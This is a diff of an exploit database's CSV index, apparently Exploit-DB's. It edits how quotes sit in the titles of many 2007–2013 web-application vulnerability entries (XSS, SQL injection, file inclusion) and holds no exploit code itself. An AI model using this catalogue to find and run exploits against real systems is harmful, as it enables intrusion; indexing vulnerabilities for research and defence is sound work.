30157,platforms/php/webapps/30157.txt,"Joomla! Component JD-Wiki 1.0.2 - dwpage.php MosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30158,platforms/php/webapps/30158.txt,"Joomla! Component JD-Wiki 1.0.2 - wantedpages.php MosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 @@ -31507,7 +31509,7 @@ id,file,description,date,author,platform,type,port 30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 - chat.php sid Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 - help.php Multiple Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 - admin/header.php admin[name] Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 -30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 - 'super/info.php' 'BASE_URL' Parameter Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 +30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 - 'super/info.php BASE_URL' Parameter Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 - setup/footer.php Multiple Parameter Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 - 'index.php' Cross-Site Scripting",2007-06-02,vagrant,php,webapps,0 30140,platforms/php/webapps/30140.txt,"Okyanusmedya - 'index.php' Cross-Site Scripting",2007-06-04,vagrant,php,webapps,0 @@ -31551,8 +31553,8 @@ id,file,description,date,author,platform,type,port 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress Plugin dzs-videogallery - Arbitrary File Upload",2013-11-26,link_satisi,php,webapps,0 -29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php' 'post_id' Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 -29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php' 'tool_url' Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 +29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php post_id' Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 +29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php tool_url' Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - admin/index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 @@ -31560,7 +31562,7 @@ id,file,description,date,author,platform,type,port 29846,platforms/php/webapps/29846.txt,"PHPwebnews 0.1 - 'index.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 29847,platforms/php/webapps/29847.txt,"PHPwebnews 0.1 - 'bukutamu.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 29848,platforms/php/webapps/29848.txt,"TuMusika Evolution 1.6 - 'index.php' Cross-Site Scripting",2007-04-12,the_Edit0r,php,webapps,0 -29849,platforms/php/webapps/29849.html,"ToendaCMS 1.5.3 - HTTP Get And Post Forms HTML Injection",2007-04-12,"Hanno Boeck",php,webapps,0 +29849,platforms/php/webapps/29849.html,"ToendaCMS 1.5.3 - GET / POST Forms HTML Injection",2007-04-12,"Hanno Boeck",php,webapps,0 29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - Check_login.asp Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps,0 29852,platforms/php/webapps/29852.txt,"Doop Content Management System 1.3.x - Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,php,webapps,0 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - Img_Popup.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 @@ -31575,7 +31577,7 @@ id,file,description,date,author,platform,type,port 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 -29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 +29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php icodir' Parameter Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion",2007-04-20,Omni,php,webapps,0 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 - You.php Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps,0 29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 @@ -31589,7 +31591,7 @@ id,file,description,date,author,platform,type,port 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - admin.php Groups Module group_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 - admin.php modsettings Module smiley_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - include/controlcenter/users.php Multiple Method Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0 -29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 - 'admin.php' 'module[]' Parameter Full Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 +29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 - 'admin.php module[]' Parameter Full Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 29891,platforms/php/webapps/29891.txt,"Phorum 5.1.20 - include/admin/banlist.php delete Parameter Cross-Site Request Forgery Banlist Deletion",2007-04-23,"Janek Vind",php,webapps,0 29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 - pm.php Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 - admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 @@ -31606,8 +31608,8 @@ id,file,description,date,author,platform,type,port 29908,platforms/php/webapps/29908.txt,"SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion",2007-04-25,s3rv3r_hack3r,php,webapps,0 29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php' 'base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php' 'base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0 29914,platforms/php/webapps/29914.txt,"Doruk100Net - 'Info.php' Remote File Inclusion",2007-04-26,Ali7,php,webapps,0 29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0 @@ -31672,10 +31674,10 @@ id,file,description,date,author,platform,type,port 30002,platforms/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/Management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' 'g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' 'g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php password0 Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php language' Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - hlstats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 @@ -31730,11 +31732,11 @@ id,file,description,date,author,platform,type,port 30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 - 'index.php' Cross-Site Scripting",2007-07-02,MustLive,php,webapps,0 30262,platforms/php/webapps/30262.txt,"Liesbeth Base CMS - Information Disclosure",2007-07-02,durito,php,webapps,0 30263,platforms/cgi/webapps/30263.txt,"Oliver - Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 -30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - '/jspui/applicationList.jsp' 'alpha' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - '/jspui/appConfig.jsp' 'task' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - '/jspui/applicationList.jsp alpha' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - '/jspui/appConfig.jsp task' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 30268,platforms/jsp/webapps/30268.txt,"NetFlow Analyzer 5 - netflow/jspui/index.jsp view Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - '/jspui/selectDevice.jsp' 'rtype' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - '/jspui/customReport.jsp' 'rtype' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - '/jspui/selectDevice.jsp rtype' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - '/jspui/customReport.jsp rtype' Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 30271,platforms/java/webapps/30271.txt,"OpManager 6/7 - ping.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 @@ -31771,8 +31773,8 @@ id,file,description,date,author,platform,type,port 30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - Philboard_forum.asp SQL Injection",2007-07-17,GeFORC3,asp,webapps,0 30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0 -30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - 'deletecomment.php' 'id' Parameter Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - 'deleteblog.php' 'id' Parameter Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - 'deletecomment.php id' Parameter Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - 'deleteblog.php id' Parameter Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - install/upgrade-0-2-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - install/upgrade-0-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - 'wp-admin/page-new.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 @@ -31860,8 +31862,8 @@ id,file,description,date,author,platform,type,port 30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30482,platforms/php/webapps/30482.txt,"Web News 1.1 - 'feed.php' 'config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30483,platforms/php/webapps/30483.txt,"Web News 1.1 - 'news.php' 'config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30482,platforms/php/webapps/30482.txt,"Web News 1.1 - 'feed.php config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30483,platforms/php/webapps/30483.txt,"Web News 1.1 - 'news.php config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 30487,platforms/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 @@ -31950,7 +31952,7 @@ id,file,description,date,author,platform,type,port 30596,platforms/php/webapps/30596.txt,"b1gMail 6.3.1 - hilfe.php Cross-Site Scripting",2007-09-17,malibu.r,php,webapps,0 30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - RC Parameter Cross-Site Scripting Vulnerabilities",2007-09-19,azizov,cgi,webapps,0 30598,platforms/cgi/webapps/30598.txt,"WebBatch - 'webbatch.exe' URL Cross-Site Scripting",2007-09-20,Doz,cgi,webapps,0 -30599,platforms/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe' 'dumpinputdata' Parameter Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 +30599,platforms/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe dumpinputdata' Parameter Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps,0 30602,platforms/php/webapps/30602.html,"WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 30603,platforms/php/webapps/30603.html,"XCMS 1.1/1.7 - Password Parameter Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 @@ -31982,11 +31984,11 @@ id,file,description,date,author,platform,type,port 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0 30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - 'login.php' mode Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 -30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - 'default.asp' 'mode2' Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 +30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - 'default.asp mode2' Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 - 'News_page.php' Cross-Site Scripting",2007-10-08,medconsultation.ru,php,webapps,0 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 30651,platforms/php/webapps/30651.txt,"Joomla! Component WebMaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,php,webapps,0 -30653,platforms/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - setup.php Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0 +30653,platforms/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - 'setup.php' Cross-Site Scripting",2007-10-09,"Omer Singer",php,webapps,0 30654,platforms/php/webapps/30654.txt,"ActiveKB NX 2.6 - 'index.php' Cross-Site Scripting",2007-10-11,durito,php,webapps,0 30655,platforms/php/webapps/30655.txt,"Joomla! Component Search 1.0.13 - SearchWord Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 30656,platforms/php/webapps/30656.txt,"BoastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,php,webapps,0 @@ -32091,14 +32093,14 @@ id,file,description,date,author,platform,type,port 30822,platforms/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps,0 30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 - 'ratephoto.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 - 'ratelink.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 -30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,php,webapps,0 -30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx' 'template' Parameter Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 +30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx template' Parameter Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injections",2007-12-04,"Adrian Pastor",asp,webapps,0 30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' rmore Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 30844,platforms/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx' template Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 @@ -32141,7 +32143,7 @@ id,file,description,date,author,platform,type,port 30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 - 'index.php' Local File Inclusion",2007-12-20,JuMp-Er,php,webapps,0 30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum - 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,cgi,webapps,0 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,php,webapps,0 -30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php' 'ID' Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 +30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php ID' Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 30924,platforms/php/webapps/30924.txt,"Dokeos 1.x - forum/viewthread.php forum Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 30925,platforms/php/webapps/30925.txt,"Dokeos 1.x - forum/viewforum.php forum Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 30926,platforms/php/webapps/30926.txt,"Dokeos 1.x - work/work.php display_upload_form Action origin Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 @@ -32195,9 +32197,9 @@ id,file,description,date,author,platform,type,port 31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - 'admin/index.html' Cross-Site Scripting",2008-01-08,Ekin0x,php,webapps,0 31003,platforms/php/webapps/31003.txt,"Omegasoft Insel 7 - Authentication Bypass / User Enumeration",2008-01-09,MC.Iglo,php,webapps,0 31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp' 'resultsForm' Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp' 'helpUrl' Parameter Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp' 'activeControl' Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp resultsForm' Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp helpUrl' Parameter Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp activeControl' Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31008,platforms/php/webapps/31008.txt,"Joomla! Component SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection",2008-01-10,consultant.securite,php,webapps,0 31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,php,webapps,0 @@ -32350,8 +32352,8 @@ id,file,description,date,author,platform,type,port 31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 31230,platforms/php/webapps/31230.txt,"WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 -31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc' 'camnum' Parameter Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 -31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic' 'id' Parameter Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc camnum' Parameter Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic id' Parameter Arbitrary Memory 